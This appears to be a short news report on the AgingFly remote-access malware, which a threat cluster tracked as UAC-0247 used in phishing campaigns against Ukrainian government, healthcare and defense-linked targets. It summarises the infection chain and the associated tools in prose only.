A newly identified malware strain known as AgingFly has been used in cyberattacks targeting Ukrainian government entities and healthcare organisations, according to findings from Ukraine’s computer emergency response team.
The activity has been attributed to a threat cluster tracked as UAC-0247, which conducted multiple incidents between March and April 2026 against municipal authorities, hospitals, and emergency medical services.
The attacks begin with phishing emails that present themselves as humanitarian aid proposals. Recipients are prompted to click a link that leads to either a compromised legitimate website or a fake site designed to deliver malicious files.
After the initial interaction, victims download an archive containing a shortcut file that triggers a multi-stage infection chain. This process uses built-in Windows tools to execute a remote HTML application, display a decoy document, and install additional payloads while remaining hidden.
The final stage of the attack deploys AgingFly along with a supporting PowerShell script known as SilentLoop. AgingFly is written in C# and provides remote access capabilities, allowing attackers to execute commands, capture screenshots, log keystrokes, and download files from infected systems.
The malware communicates with its command server using encrypted WebSocket connections and retrieves instructions dynamically rather than storing them locally. This approach allows attackers to modify functionality during execution and complicates detection.
In parallel with deploying AgingFly, the attackers use additional tools to extract sensitive data. These include ChromElevator to collect credentials from Chromium-based browsers and ZapixDesk to access WhatsApp data.
Researchers reported that the campaign also involves reconnaissance and lateral movement within compromised networks. Attackers use tools such as RustScan for network scanning and tunnelling utilities to maintain access to infected environments.
In some cases, the activity extended beyond data theft. Investigators identified the use of cryptocurrency mining software on compromised systems, indicating additional use of computing resources after initial access.
The campaign has also targeted individuals connected to Ukraine’s defense sector. In one instance, malicious files were distributed through the Signal messaging platform, disguised as legitimate software updates.
The origin of the threat group has not been publicly confirmed. Ukrainian authorities continue to monitor the activity and have issued recommendations to restrict the execution of certain file types and system utilities commonly used in the attack chain.